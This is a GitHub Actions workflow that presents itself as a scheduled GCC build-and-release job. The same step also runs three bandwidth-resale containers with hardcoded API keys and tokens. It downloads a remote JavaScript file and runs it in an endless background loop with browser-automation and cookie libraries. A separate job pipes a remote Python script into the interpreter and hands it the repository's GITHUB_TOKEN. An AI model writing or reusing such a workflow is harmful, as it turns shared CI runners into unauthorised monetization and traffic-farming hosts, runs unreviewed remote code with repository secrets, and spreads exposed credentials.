on:
    schedule:
    - cron: '0 */12 * * *'
    
jobs:
    build:
        runs-on: ubuntu-24.04
        timeout-minutes: 355
        permissions:
            contents: write
        strategy:
            fail-fast: false
            matrix:
                color: [0, 1]
        steps:
        - run: |
              podman run --init -d -e RP_EMAIL=chaowen.guo1@gmail.com -e RP_API_KEY=9b23ebb9-2ee1-427f-a271-f6fdf536537b docker.io/repocket/repocket
              podman run --init -d docker.io/traffmonetizer/cli_v2 start accept --token ELGPy/DEQYDtARslA6HnkrbPIF6JQi+qYLCre5LBe58=
              podman run --init -d -e EARNFM_TOKEN=0a981b92-0b71-44a2-bdec-eceb5d946025 docker.io/earnfm/earnfm-client
              curl -o alexamaster.mjs https://dev.azure.com/chaowenguo/ci/_apis/git/repositories/ci/items?path=alexamaster.mjs
              npm install patchright tough-cookie @chaowenguo/tlsclient
              while true
              do 
                  node alexamaster.mjs
              done &
              sudo apt update
              sudo apt install -y --no-install-recommends autogen flex
              git clone https://gcc.gnu.org/git/gcc.git
              cd gcc
              ./contrib/download_prerequisites
              mkdir build
              cd build
              ../configure --enable-threads=posix --enable-checking=release --disable-multilib --enable-languages=c,c++ #--enable-__cxa_atexit
              make #-j2
              make clean
              make
              sudo make install-strip
              cd ${{github.workspace}}
              tar -cjvf gcc.tar.bz2 gcc
        - uses: softprops/action-gh-release@master
          with:
              token: ${{secrets.GITHUB_TOKEN}}
              tag_name: 1
              files: gcc.tar.bz2
    clean:
        runs-on: ubuntu-24.04
        permissions:
            actions: write
        steps:
        - run: |
              sudo apt update
              sudo apt install -y --no-install-recommends python3-aiohttp
              curl https://bitbucket.org/chaowenguo/common/raw/main/clean.py | python3 - ${{secrets.GITHUB_TOKEN}}
